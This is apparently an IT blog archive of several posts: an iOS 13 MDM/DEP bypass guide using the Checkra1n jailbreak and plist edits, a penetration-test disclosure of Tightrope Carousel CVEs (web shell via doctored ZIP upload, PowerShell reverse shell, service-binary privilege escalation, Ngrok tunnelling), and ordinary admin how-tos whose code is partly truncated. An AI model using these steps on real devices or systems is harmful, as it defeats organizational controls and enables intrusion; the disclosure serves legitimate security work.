iOS 13 MDM/DEP Bypass (using Checkra1n jailbreak)

Before anyone comments about this being a bad idea, let it be known that I’m not responsible for any trouble you may get in for doing this. I’m part of the hacking team at my organization, so this is the type of thing I’m supposed to be doing, but unless you are too, I’d probably advise against this.

Using Checkra1n on my iPhone 8 running iOS 13.2.2 (downgraded from 13.2.3), I have successfully found how to bypass organizational MDM (forced through DEP). In my test case, I was using Blackberry’s MDM services, but I believe this should probably work for any MDM provider.

I’m going to leave these instructions relatively vague. If you can follow them, go for it; if you can’t, you probably should not be jailbreaking your corporate device.

NOTE: This is on a device that has been freshly wiped, or at least had the contents of “/var/containers/Shared/SystemGroup/” removed. If you already have MDM applied to your device, try wiping the contents of that directory and rebooting. It’ll probably reset a lot of settings, but that seemed to remove MDM for me (and allow me to prevent its application) after a reboot.


  1. Jailbreak your device using Checkra1n.
  2. On your phone, walk through the “Welcome” wizard, set your wifi, and then when you get to the screen that says “Your organization requires policies” (not verbatim, but that’s the general message), move on to Step 3.
  3. Connect to your device using SSH via iProxy (username is root, password is alpine).
  4. Using SSH on the device, navigate to “/var/containers/Shared/SystemGroup/”.
  5. Ensure the following 2 files are present: “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”.
  6. If not already installed, install the “nano” text editor on your device via “apt” (or use vi, if that’s there by default, which I assume it is).
  7. Using your text editor, modify both “CloudConfigurationDetails.plist” and “CloudConfigurationSetAsideDetails.plist”, making the following changes to both files:
    • NOTE: If any of these variables are not present, you can try just leaving them missing. If that doesn’t work, add them with the values I’ve specified.
    • Change the value of the integer “IsMDMUnremovable” to 0.
    • Change the value of the bool “IsMandatory” to false.
    • Change the value of the bool “IsSupervised” to false.
  8. Restart your device (you can either re-jailbreak it using Checkra1n or just let it boot normally; either should be fine).
  9. When booted back up, walk through the “Welcome” wizard again, and this time when you get to the corporate policy screen, click through it. You should have the option to ignore the policies and not apply them.
  10. That’s it. After you reboot again, the device will still be activated but without any MDM.

NOTE: I wrote this shortly after figuring this process out. It’s possible that the policies will attempt to re-apply periodically and/or after an iOS upgrade, but I don’t know for sure. I’ll edit this post if I find any further info.

Edit: Just found this post, which says that hex-editing the Checkra1n app to increase the max_supported_version number to iOS 13.2.3 should allow devices on the most recent iOS release to be jailbroken without needing to downgrade.

Edit2: I just upgraded to 13.2.3 and my MDM-bypass is still fine (I was not prompted to re-enroll after upgrading).

Vulnerabilities in Tightrope Media Systems Carousel <= (and likely newer)

While on a recent penetration test, I discovered a digital signage system made by Tightrope Media Systems (TRMS). The client was using this software on an appliance provided by TRMS which was essentially an x86 Windows 10 PC. I was able to gain access into the web-interface of this system due to an unchanged default administrator password. I found references online to a vulnerability in the version of this system that allows for an arbitrary file read (LFI) on the system via the RenderingFetch API function (CVE-2018-14573). By reading the CVE and the API documentation, I was able to successfully read files on the system.

Local File Inclusion (LFI) via the RenderingFetch API

I attempted to read protected files, such as the SQL database of the application itself (expecting it to fail, as even if the user account did have read permission to this file, the file would have been locked). Eventually though, I found that the system included a handy database backup function which included the ability to email the backed up file to an arbitrary address. I emailed a copy of the database to myself, but found that due to a bug in the system, it did not include the actual db I wanted, just the secondary db that did not include any user authentication details.

After this disappointing result, I set out to find other ways to compromise the system. I explored the Carousel webui and found something interesting. This interface allows for the uploading of “bulletins”, or in other words, items to display on the digital signage screen.

Carousel bulletin management page

I analyzed the bulletin import mechanism and found that it appeared to accept ZIP files for uploading. Upon attempting to upload a random file, however, it was rejected as not properly formatted. In order to identify the format of these files, I found that I could export an existing bulletin and then open this ZIP file up on my system to look at the structure. Inside of the file, there is a folder called “Pages”, with another folder within that named with a random GUID. I inserted two malicious .ASPX files and then attempted to upload the file.

Malicious ASPX files inside of exported bulletin ZIP file

After this, I was able to successfully upload the ZIP file to the system. I identified the GUID of the newly created (via import) bulletin by looking at the URL attached to the preview image on the webui. To clarify, the GUID inside of the ZIP file is not the GUID once it’s imported into the system. I then attempted to navigate to the URL of the malicious ASPX files I had inserted into the ZIP, but they were not found.

Frustrated, I analyzed the original ZIP file via unzip on Linux, along with 7-Zip on Windows. It appeared that when inserting files into this ZIP archive, the path separator for files and directories was being set to the forward-slash character (“/”) rather than the backslash character (“\”). This caused the files I added to be discarded by the server upon upload. I was eventually able to see this clearly by opening the file in a hex editor.

Bad ZIP file with improperly-formatted additional file

I decided to try to manually change the “/” to a “\” for the files I added to the archive with a hex editor. I just selected the wrong character, typed the right character, and then saved the file. “Surely this will not work”, I thought.

ZIP file after modifying the path-separator character of the newly added files with a hex editor

After modifying the ZIP file with the hex editing tool, I uploaded it to Carousel and found it listed in the main bulletin listing (as I had with my first attempt). I then selected the bulletin and inspected the URL of the preview image (to determine the GUID and full-path to the directory where my files had been imported).

Malicious bulletin archive successfully imported

After identifying the path to the imported files, I attempted to navigate to my malicious ASPX files in that directory. Sure enough, they loaded! I was able to successfully execute commands on the system via a web shell. I first attempted a standard directory listing of the C:\ drive, and then ran whoami.

Directory listing of C:\ drive
whoami showing application being run in context of IIS AppPool\Carousel

Running commands via the web shell became a bit tiresome, so I decided to upload a Powershell file that would connect a remote interactive shell back to my attacking system.

Downloading reverse shell to target system via Powershell
Reverse shell successfully downloaded to target system

I started a listener on my attacking machine and executed the reverse shell Powershell script via the web shell, which caused the targeted system to connect back to me and provide a fully-interactive command prompt.

With that, I had achieved arbitrary file upload and remote code execution on this system. This has been classified as CVE-2018-18930.

Despite having fully-interactive access to this system, I was still running in the context of a restricted account. I set out looking for a way to elevate my privileges. I noticed that the path that uploaded files are saved to was C:\TRMS\Web\Carousel\Media. This meant that the restricted IIS account had write-access to at least that folder. I navigated to the C:\TRMS directory and saw that it appeared an application (an installed application, as opposed to the web app) was running from another directory under the C:\TRMS folder. I issued a command to view the services running on the system and the user accounts they run under. I found two services with “Carousel” in the name running under the SYSTEM account.

Two Carousel services running as SYSTEM

After identifying these services, I issued another command to identify the path at which the executables these services used were located.

Paths of the Carousel services

I then executed a command to show the permissions (ACL) of service executables, trying to identify if we had the ability to modify these files. Sure enough, the “NT Authority\Authenticated Users” group had “Modify” permissions to the service exe file.

“NT Authority\Authenticated Users” with “Modify” permissions to Carousel.Service.exe

I built a small exe file in C# that would execute various commands I compiled into the application, such as a command to create a user account. I moved the original exe file and uploaded my malicious exe to the location the service exe resides.

Malicous exe (Carousel.Service.exe) uploaded, after renaming original

I now needed to restart the service. Unfortunately, the user account I was running under did not have permission to restart services on this system. I found that it did, however, have the ability to restart the server. I ran a command to reboot, knowing that this would achieve the same thing as restarting the service (albeit with slightly higher risk, as the entire system would go down temporarily). After the system came back up, I ran a command to view the local users and administrators on the system and found that my account had been created and was now a local admin!

Rebooting system to restart service
User account “gfsec” created an a member of the local admins group

Now armed with a local user account belonging to the admin group, I attempted to connect remotely directly to SMB. I found, however, that the configuration of this machine did not allow for connections to essentially anything except 80 and 443. Turning off the firewall didn’t seem to help. I ended up uploading Ngrok to the system. Ngrok is a free application/service that allows for bypassing NAT and firewalls, generally used for web development when developers do not have the ability to open up holes in their firewall and forward ports. The application runs on the target system and connects to a local port of your choosing that you wish to connect to from remotely. Then, you are given a randomly generated URL and port number for which you can connect to your target system from anywhere in the world. I ran this on the Carousel system and pointed it at the local SMB port of 445.

Ngrok running, attached to local port 445

After making the SMB port available to remote systems, I was able to authenticate via SMB with Metasploit and have full control over the system conveniently. This privilege-escalation vulnerability has been assigned CVE-2018-18931.

While exploring the system, I eventually uncovered the remnants of a system image deployment. When Windows systems are imaged, administrators can use an Unattend.xml file to control various settings on the new system. This includes local accounts and passwords. I found that the Unattend.xml file left on the system included the creation of a local admin account (along with the password). This default password has been assigned CVE-2018-18929.

Tightrope Media Systems was notified of these vulnerabilities on in early November 2018. They responded back on 11/13/2018 stating that they believed these bugs were fixed and requested the contact info of my client to ensure they were on the latest version. They have not followed-up with me to discuss with them the specifics of these vulnerabilities. Now that approximately 90 days have elapsed since original disclosure, this information is being made publicly available.

UPDATE (2/7/19): Tightrope Media Systems has reached out to me regarding this post and the vulnerabilities discussed. They apologized for the way that the situation was handled on their end and have stated their intention to review how they triage reported security issues. The CEO personally thanked me for my contribution to their security and committed to improving their internal processes. This is a lot better than being threatened with litigation, as has happened to me in the past from other vendors, so I applaud TRMS for their response after this came to their attention (again). If you are a customer, they have released a bulletin regarding the CVEs along with a workaround to mitigate some of the disclosed issues. They are planning to release a patch on 2/8/19.

Solution for Subnet Conflict Between VPN and LAN

We had an issue at work where VPN users are having intermittent difficulty reaching servers due to a subnet conflict, ie the VPN network is 192.168.1.X, and so is the LAN they’re connecting from. It displayed itself in a strange way: application connections would fail repeated attempts, but after pinging the servers in question the first ping would fail but the next 3 would work, and then the application would work, for a while. Finally I developed a solution for this. Here’s what I did: create a Powershell script that identifies the IP address of the VPN connection, then create a static route for the and subnets (since that’s another common home subnet, as well as one running at the office) going out the VPN connection’s IP with a lower metric number than everything else. Then, set a scheduled task to run automatically when the VPN connection occurs (task triggered by event). Save the script as “Fix_VPN.ps1” at the root of the C drive and import the scheduled task (you may need to make sure that the event I have triggering this is also being generated by whatever VPN solution you’re using; we’re using built in RAS (SSTP)).

Powershell Script:

$ErrorActionPreference= 'silentlycontinue'
$ip = $null
$nics = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
foreach ($nic in $nics) {
   if($nic.Name -like "*VPN*"){
      $props = $nic.GetIPProperties()
      $addresses = $props.UnicastAddresses
      foreach ($addr in $addresses) {
         $ip = $($addr.Address.IPAddressToString)
if($ip -ne $null){
   route delete METRIC 1 | Out-Null
   route delete METRIC 1 | Out-Null
   route add mask $ip METRIC 1 | Out-Null
   route add mask $ip METRIC 1 | Out-Null

Scheduled Task:

   <?xml version="1.0" encoding="UTF-16"?>
    <Task version="1.2" xmlns="">
          <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Rasman'] and EventID=20267]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
        <Principal id="Author">
      <Actions Context="Author">

Nginx (Reverse SSL Proxy) with ModSecurity (Web App Firewall) on CentOS 7 (Part 1)

Today I’ll demonstrate how to install the Nginx webserver/reverse proxy, with the ModSecurity web application firewall, configured as a reverse SSL proxy, on CentOS 7.  This is useful in scenarios where you are terminating incoming SSL traffic at a centralized location and are interested in implementing a web application firewall to protect the web servers sitting behind the proxy.  This setup can also support multiple sites (ie different host names) using Server Name Indication (SNI) for SSL.  If multiple sites are being protected you will need a different SSL certificate for each site (unless a wildcard or SAN certificate will suffice for the sites in question, in which case SNI is not used).  There is an abundance of information available online showing how to do this on Ubuntu/Debian, but not for CentOS.  In Part 1 (this post) we’ll compile everything, install Nginx, and configure a reverse SSL proxy and in Part 2 we’ll configure ModSecurity.

The first step is to deploy a fresh VM with CentOS 7.  We are using the x64 version, but I don’t see why the x86 version would be any different.

Log on to the server and either elevate to a root shell or execute all commands below using sudo.

Here we are downloading and installing the EPEL (Enterprise Packages for Enterprise Linux)
repository to provide access to some of the prerequisite packages we need.  After that we install all of the required packages.

rpm -ivh       
yum update       
yum install gc gcc gcc-c++ pcre-devel zlib-devel make wget openssl-devel libxml2-devel libxslt-devel gd-devel perl-ExtUtils-Embed GeoIP-devel gperftools gperftools-devel libatomic_ops-devel perl-ExtUtils-Embed libtool httpd-devel automake curl-devel       

After installing all of the prerequisite packages we create a user named “nginx” for the daemon to run as.  We also set the login shell to “nologin” to prevent a compromised account from gaining access to a real shell.

useradd nginx       
usermod -s /sbin/nologin nginx       

Now let’s download ModSecurity to the /usr/src/ directory, untar it, and change to the unpacked folder.  At the time of this writing the latest version was 2.9.0.  You can find downloads for the latest version at

cd /usr/src/       
tar xzvf modsecurity-2.9.0.tar.gz       
cd modsecurity-2.9.0/       

Now inside the source directory, run, then configure with the “enable-standalone-module” option, and finally make the module.

./configure --enable-standalone-module       

After building the ModSecurity module, move back to the /usr/src/ directory, download Nginx, untar it, and then enter the unpacked directory.  The latest version of Nginx at the time of this writing was 1.9.7.  Newer versions can be found at

cd /usr/src/       
tar xzvf nginx-1.9.7.tar.gz       
cd nginx-1.9.7/       

After navigating to the extracted directory run configure, then make, and then make install.  The “add-module” option set with configure will point to the nginx/modsecurity/ directory which should be inside of the extracted ModSecurity directory from earlier.  The default behavior of nginx is to install to /usr/local/nginx, but in the command below we’re changing the location of where some files are stored. First, the binary “nginx” is being saved directly in /usr/sbin/ to make things easier dealing with $PATH. We’re setting the conf path to the /etc/nginx/ directory, the PID path to the /var/run/ directory, and the log paths to /var/log/nginx/. I have two reasons for changing these paths: 1 – to keep the respective folders in the standard locations, and 2 – to allow SELinux to function using default rules. There are default SELinux rules related to /sbin/nginx, /etc/nginx/, and /var/log/nginx/, and I’ve found it much easier to work with SELinux if I just keep everything possible in the locations that are already predefined. There will be more later showing how to add SELinux rules to account for the directories that aren’t predefined.

./configure --user=nginx --group=nginx --with-pcre-jit --with-debug --with-ipv6 --with-http_ssl_module --add-module=/usr/src/modsecurity-2.9.0/nginx/modsecurity --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/ --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log
make install       

Now let’s setup a systemd service to allow Nginx to autostart with the server.  In the first block of code we’ll navigate to the proper directory, then we’ll create a file to tell systemd what to do.  The second block of code will contain the contents of the file we created before that.

cd /usr/lib/systemd/system
nano nginx.service
# nginx signals reference doc:
Description=A high performance web server and a reverse proxy server

ExecStartPre=/usr/sbin/nginx -t -q -g 'daemon on; master_process on;'
ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload
ExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /var/run/


Now we need to edit the conf file for Nginx.  Before we do that though we create two folders: sites-available and sites-enabled, just like in Apache, to hold our vhosts.

mkdir /etc/nginx/sites-available
mkdir /etc/nginx/sites-enabled
nano /etc/nginx/nginx.conf

Change the config file to what’s listed below. NOTE: For “worker_processes” set the number to the number of cores you wish to dedicate to the server.

user nginx;
worker_processes  1;

events {
    worker_connections  1024;

http {
    include       mime.types;
    default_type  application/octet-stream;
    sendfile        on;
    keepalive_timeout  65;
    gzip  on;
    include /etc/nginx/sites-enabled/*;

Here we generate a Diffie-Hellman key larger than OpenSSL’s default size of 1024. We’ll do 4096.

cd /etc/ssl/certs
openssl dhparam -out dhparam.pem 4096

Now we need to create a folder to hold our SSL files. Inside of that folder we’ll create subfolders for each vhost’s certs. Though not shown below, place your certificate and key files in the vhost SSL directory. We also create a vhost config file in the sites-available directory.

mkdir /etc/nginx/ssl
mkdir /etc/nginx/ssl/localhost
nano /etc/nginx/sites-available/ssl.conf

Add the following to the file just created. Make sure for the “ssl_certificate” and “ssl_certificate_key” lines you point to the proper locations. Set the “server_name” line to the hostname of your server (make sure it matches the SSL certificate). Set the “proxy_pass” line to point to the server you’re proxying to. In the example below we’re connecting to port 80 locally, but in most cases this would be a separate server. If you have several SSL certificates and want to define one of the vhosts as default, add “default_server” on the “listen” line, between the port number and semicolon.

server {
        listen   443;

        server_name localhost;
        ssl                  on;
        ssl_certificate      /etc/nginx/ssl/localhost/localhost.crt;
        ssl_certificate_key  /etc/nginx/ssl/localhost/localhost.key;

        ssl_session_timeout  5m;

        ssl_protocols  TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
        ssl_prefer_server_ciphers on;
        ssl_session_cache shared:SSL:10m;
        ssl_dhparam /etc/ssl/certs/dhparam.pem;

        location / {
          proxy_set_header X-Real-IP  $remote_addr;
          proxy_set_header X-Forwarded-For $remote_addr;
          proxy_set_header Host $host;
          proxy_set_header X-Forwarded-Proto $scheme;
          proxy_read_timeout 90;

Create a symlink from the site(s) in the sites-available directory to the sites-enabled directory to activate the sites. Then test to make sure the config files don’t contain any errors.

ln -s /etc/nginx/sites-available/ssl.conf /etc/nginx/sites-enabled/ssl.conf
nginx -T

Assuming nginx -T doesn’t return any errors, everything should be all ready to go! Enable the service, start it, then verify it’s running.

systemctl enable nginx.service
systemctl start nginx.service
systemctl status nginx.service

If you need to open up the firewall to allow incoming traffic, use the command below

firewall-cmd --add-port=443/tcp --permanent
firewall-cmd --reload

Python – Mass-Mail w/ Attachment

I wrote a Python script today to mass-mail files to our clients. Our wonderful ERP system screwed up again, leaving us with PDFs of the information we needed to send out, the filenames being prefixed with a unique ID per-recipient. Rather than re-generate all documents and have them sent out properly (which likely wouldn’t have happened due to bugs in the system from a recent upgrade) we wrote this script to mail out the documents we already had. We created a CSV file with two columns: column one has the unique filename prefix, column two has the corresponding recipient’s email address.

import csv
import os
import smtplib
import mimetypes
from email.mime.multipart import MIMEMultipart
from email import encoders
from email.message import Message
from import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.text import MIMEText

def readCSV():
    clientCSVList = []
        #set below to the CSV file you want to read.  Two columns:
        #1 - file prefix to search
        #2 - email address to send file to 
        with open("csvFile", 'rb') as csvfile: 
            clientReader = csv.reader(csvfile, delimiter=',')

            missing = 0
            for clientNum, email in clientReader:
                found = False
                for file in os.listdir("folder_with_files"):
                    if file.startswith(clientNum):
                        clientCSVList.append([clientNum, email, file])
                        found = True
                if found == False:
                    missing += 1
                    print clientNum + " " + email

        print clientCSVList
        print "Missing: " + str(missing)
    except Exception as e:
        print "Exception: " + str(e.args)

        for client in clientCSVList:
            send_email("[email protected]", client[1], "Email Subject Here", "This text is supposed to be the body, but doesn't seem to appear", client[2])
            print client[0] + " Success"

    except Exception as e:
        print "Exception: " + str(e.args)
        print client[0] + " Failure"

def send_email(sender, receiver, subject, message, fileattachment=None):
    emailfrom = sender
    emailto = receiver
    fileToSend = fileattachment
    username = "smtp_username"
    password = "smtp_password"

    msg = MIMEMultipart()
    msg["From"] = emailfrom
    msg["To"] = emailto
    msg["Subject"] = subject
    msg["Message"] = message
    msg.preamble = message

    ctype, encoding = mimetypes.guess_type(fileToSend)
    if ctype is None or encoding is not None:
        ctype = "application/octet-stream"

    maintype, subtype = ctype.split("/", 1)

    if maintype == "text":
        fp = open(fileToSend)
        # Note: we should handle calculating the charset
        attachment = MIMEText(, _subtype=subtype)
    elif maintype == "image":
        fp = open(fileToSend, "rb")
        attachment = MIMEImage(, _subtype=subtype)
    elif maintype == "audio":
        fp = open(fileToSend, "rb")
        attachment = MIMEAudio(, _subtype=subtype)
        fp = open(fileToSend, "rb")
        attachment = MIMEBase(maintype, subtype)
    attachment.add_header("Content-Disposition", "attachment", filename=fileToSend)

    server = smtplib.SMTP("server:25") #insert SMTP server:port in quotes
    server.sendmail(emailfrom, emailto, msg.as_string())

def main():

if __name__ == "__main__":

Manual WordPress Backup (on Windows)

I was running the WP-DB-Backup plugin for this blog up until recently when it suddenly stopped working.  I tried troubleshooting a little bit before I said “screw it, I’ll backup myself”.  My solution was to write a script that will create a dump of my MySQL database, add it and my WordPress directory to a password-protected 7-Zip file, then email it to my GMail account and automatically archive it for safe keeping.  This was all created in one batch file.  The steps I took to perform these actions are as follows:

1. For the first few lines of the script, we’re going to set variables to set a date and time stamp on our archive, that way we’ll know exactly where it came from (and won’t overwrite anything if we choose to store the backup locally).

For the first lines of the script, write:

set T=%time:~0,5%
set UniqueDir=%date:/=-% %T::=-%

For the next line, we’re going to set the location of the backup file.  Type out:

set backupfile="c:\path to backup\%UniqueDir%.7z"

2. Create the MySQL dump.  To do this, add the line

"C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqldump.exe" --user=MySQL-user-here --password=pw-here blog-db-name-here > c:\path to backup\blog_name.sql

3. Create the 7-Zip archive by archiving the SQL file we created along with the WordPress directory of your site.  Start by downloading and installing 7-Zip.  Then, add the line:

"C:\Program Files\7-Zip\7z.exe" a -t7z -pPASSWORD-HERE %backupfile% C:\inetpub\wwwroot\website_name\wordpress c:\path to backup\blog_name.sql

This creates the password protected archive named Date + Time.7z at the location you specify in the “backupfile” variable.  The archive is protected with PASSWORD-HERE (and please note the lack of a space between the “-p” switch and the password.  The archive includes the wordpress directory specified and the blog_name.sql file specified.  You can add whatever other files you’d like after that, if desired.

4. Now it’s time to email the archive.  To do this, we need to download the program “SendEmail”.  This is a command line utility that will allow us to send email messages via the command line (or batch file, in this case).  Once you’ve downloaded it, extract the contents of the zip file to c:\SendEmail.  Now we’re going to add a line to our batch file that says:

"c:\sendemail\sendEmail.exe" -f [email protected] -t [email protected] -u Blog Backup for %UniqueDir% -m "See attached for backup" -s SMTP Server Here -xu SMTP User, if needed -xp SMTP PW, if needed -a %backupfile%

You can exclude the -xu and -xp switches if you don’t need to authenticate with your mail server to send messages.

5. This part is optional.  To remove the backup files from the local machine, we add two lines to delete the SQL dump file and the 7-Zip archive we’ve created:

del c:\path to backup\blog_name.sql
del %backupfile%

That’s it!  Now all that’s left to do is create a scheduled task using the Windows Task Scheduler to run this every evening (or however often you feel like).  This will create a SQL dump, 7-Zip it with the WordPress directory, email it to a specified address, then delete the local copy of the backup.  A full version of the script is below:

set T=%time:~0,5%
set UniqueDir=%date:/=-% %T::=-%

set backupfile="c:\path to backup\%UniqueDir%.7z"

"C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqldump.exe" --user=MySQL-user-here --password=pw-here blog-db-name-here > c:\path to backup\blog_name.sql

"C:\Program Files\7-Zip\7z.exe" a -t7z -pPASSWORD-HERE %backupfile% C:\inetpub\wwwroot\website_name\wordpress c:\path to backup\blog_name.sql

"C:\sendemail\sendEmail.exe" -f [email protected] -t [email protected] -u Blog Backup for %UniqueDir% -m "See attached for backup" -s SMTP Server Here -xu SMTP User, if needed -xp SMTP PW, if needed -a %backupfile%

del c:\path to backup\blog_name.sql
del %backupfile%

Unable To Install Microsoft Security Essentials <Solved>

I’ve just spent the past hour or so fighting a co-worker’s personal computer, trying to get Microsoft Security Essentials to re-install (she had originally installed v1 of MSE, and when the v2 came out not too long ago and it attempted to upgrade, apparently it hosed her antivirus installation).  Her machine is running XP SP3 32-bit.

The original error code we received was 0x80070002 when trying to run the v2 installer.  I tried to run the v1 installer (downloaded from, hoping to re-write whatever had become corrupted (as Add/Remove Programs didn’t show MSE as being installed at all).  However, that didn’t do anything, and it ended up failing to install as well.  From there, I went into Program Files and renamed the Microsoft Security Essentials folder so that the installation would be able to write to a fresh folder.  That didn’t work.  Then, I entered the Registry…

In the Registry, I searched for “Security Essentials” and proceeded to delete every KEY (which is the term for the folders) that contained any items referencing Security Essentials.  This took a while.  I re-ran the installation after that, to no avail.

I then went digging around the Application Data folder (C:\Documents and Settings\All Users\Application Data) and deleted the Microsoft Security Essentials folder and files.  I also went back into the Registry and searched for “Microsoft Antimalware” and again deleted every key containing items referencing the string I searched for.

At one point, after ripping enough items out of the registry, the error message I received changed.  It eventually  became 0x80070643, 0x80070648 and finally 0x80070645.  I then found a post that described two registry keys that could be causing problems (they appear to be telling the installer to upgrade rather than do a fresh install).  Once I removed these two keys and rebooted, all was well after re-attempting to install.  Below are the two keys I removed.

HKEY_CLASSES_ROOT > Installer > UpgradeCodes > 1F69ACF0D1CF2B7418F292F0E05EC20B

—Right click on1F69ACF0D1CF2B7418F292F0E05EC20B and delete the key

HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Installer > UpgradeCodes > 1F69ACF0D1CF2B7418F292F0E05EC20B

— Right click on1F69ACF0D1CF2B7418F292F0E05EC20B and delete the key.

I’m not sure if everything I did is necessary in order to achieve the desired results.  I’d recommend trying to remove the two last keys mentioned first, and if that doesn’t work, do everything else.  As always, keep in mind, removing information from the Registry is potentially dangerous to your system’s health, so make a backup of the Registry before proceeding.

Exchange 2007 Calendar Sharing Problem

“You do not have sufficient permission to perform this operation on this object. See the folder contact or your system administrator.”

This message has haunted me for a number of months.  I originally had set up calendar sharing permissions between my management team to allow for easy viewing of each others’ schedules.  This is a total PITA to do by logging into each users’ Outlook and manually sharing the calendar.  I wanted to allow the users to open specific calendars at will, but didn’t want to have to interact with my users in the process.

To set these permissions, I used PFDAVAdmin, a free tool from Microsoft that allows you to manipulate Exchange data.  I created a mail-enabled security group in Exchange and added all the users to this group.  I then went through with PFDAVAdmin and gave this group “Reviewer” permissions on each users’ calendar within their mailbox.  This worked fine for a while.  Then all of a sudden I started receiving the message quoted at the beginning of this article when new users opened shared calendars that they supposedly had permissions to view.

I had to change a few things to resolve this, and I still don’t know what caused it to begin with.

First, using PFDAVAdmin, I verified that the user did not have permissions set on the calendar object that were less than the group had.  For example, for some reason my user had the “Folder Visible” permission while the group he was a member of had the “Reviewer” permission.  Why he had “Folder Visible” to begin with is another story, but I removed his individual account from the DACL.

Next, I had to modify the “Freebusy Data” object in the user’s mailbox.  For some reason adding users/groups to the DACL of the calendar object wasn’t automatically updating the Free/Busy object.  I went into this object in each user’s mailbox and again added the group and granted them the “Reviewer” permission.  This fixed the problem with shared calendar data not appearing in Outlook and got rid of the error message.

A side note: I found that some users attempted to share their calendar with “Everyone”, which resulted in the “Folder Visible” permission assigned to “\Everyone” in the DACL within PFDAVAdmin.  This caused strange things to happen, such as shared calendars opening and displaying data, yet the user received the “insufficient permission” error from above.  I removed “Everyone” from the DACL (or changed the permission to “Reviewer”), and this made those problems go away.


How to use PFDAVAdmin:

1. Open program and click File –> Connect

2. Input the mailbox server’s name in “Exchange Server” field and a DC with the Global Catalog in the “Global Catalog” field

3. Under Connection, select “All Mailboxes”.  Click OK.

4. Expand the mailbox of the user you’re working on.  The “Freebusy data” object is directly below the user.  To edit the DACL, right-click the object and select “Folder Permissions”.

5. Click “Add” in the “Permissions” windows.  Type the name of the mailbox you wish to add permissions for (ie john.doe if I’m giving John Doe reviewer access to the selected mailbox).  Click search to find the user.  Then click OK.

6. Select the user in the name list (back in the Permissions window), then select the desired permissions in the drop-down box.  Then click “Commit Changes”.

The “Calendar” object can be found under the “Top of Information Store” object in the users’ mailbox.

RemoteApp Dual Monitor Setup

RemoteApp is a cool feature of 2008/2008 R2 that allows a user to establish a remote session with just the application they’re working with.  Multiple applications can be used at once (on one or multiple remote servers).  This is a technology called “presentation virtualization”.  Citrix offers this capability, but Citrix is also fairly pricey.

A number of months back I set up a RemoteApp server (with the RD Web Access feature, which allows users to access RemoteApp apps from a web browser anywhere they go) for an employee who was moving but was going to still be working with the company.  I was tasked with setting her up to work remotely.  Given my miniscule budget, this was one of my only options, as a direct connection back to the office (or even an internet connection for both the remote worker’s home and the office) that was fast enough to support transferring the needed files we work with daily was just too darn expensive.

One of the things that my co-workers enjoy is the ability to use dual monitors to work more productively.  It is possible to do this with RemoteApp, as well.    There are a few requirements for this to work, however.

  1. All monitors must be the same resolution.
  2. Upper-left (or just left, if you only have two monitors) monitor must be the “primary display”.  This can be specified by going into the screen resolution settings.
  3. The total resolution (of all monitors) must not exceed 4096×2048 (4096 across by 2048 high).

I had a user today who was unable to use both of her displays for accessing the RemoteApp server.  I checked the settings listed above, and all were correct.  However, it appears that you need a certain function of the Remote Desktop Connection application (mstsc) to properly display with multiple monitors in a RemoteApp session.  For whatever reason, this user was running an outdated version of this program.  I installed KB969084 on her machine, rebooted, and mult-monitors worked like a champ.  Now to figure out why WSUS didn’t install that update automatically on her machine…

Trouble Installing Windows Live Essentials 2011 <Solved>

Ironically enough, I downloaded Windows Live Essentials 2011 on my work PC to write another blog post about something (that I’ll hopefully get to later).  I had a hell of a time installing WLE.  I kept receiving an error from the installer.  It said: Error 0x80070643. Source: wllogin-amd64.

I tried lots of different things to resolve this issue.  The event log was showing that the installer couldn’t register a certain DLL file.  Knowing this, I copied the needed file from my home PC and tried to manually register it.  I should have known something was off when I didn’t get a message from the regsvr32.exe program when I registered the DLL.  However, I continued on, installing, uninstalling, compatibility mode, disabling A/V, etc.

Finally, when I had just about given up, I browsed to my SysWow64 folder (I’m running Win7 x64), and looked for regsvr32.exe, the file the event log was complaining about.  I had just assumed that the DLL file the installer was trying to register was not able to be located.  I didn’t think about regsvr32.exe being missing.  However, I was surprised to find that I didn’t have regsvr32.exe in my SysWow64 folder.  Instead I had a regsvr32.exe.DEL file.  I removed a virus from my PC a few weeks back.  Perhaps that is what renamed that crucial Windows file.

I removed the .DEL extension, then removed all remnants of WLE (using Installer Cleanup Utility and manually deleting the WLE Program Files folder).  I then re-installed WLE.  It appeared to install all the way through this time, however, the event log showed information events (not errors) suggesting that the Windows Live ID Sign-In Assistant was having trouble installing (this was the component that the problematic DLL file is related to).  When I launched Writer, the splash screen would display for a few seconds, then close, and the process would end.  To fix this (once and for all), I then ran a repair install of WLE, which seems to have permanently resolved the issue.

TL;DR – Make sure the SysWow64 folder has regsvr32.exe, if you’re running Windows x64, or the System32 folder, if you’re running 32 bit.

EDIT: If you’re attempting to troubleshoot a WLE problem, it may be less time consuming to download and install the offline installer rather than using the web setup, as the program will attempt to download various components each time.  The d/l is about 155MB.  Located here: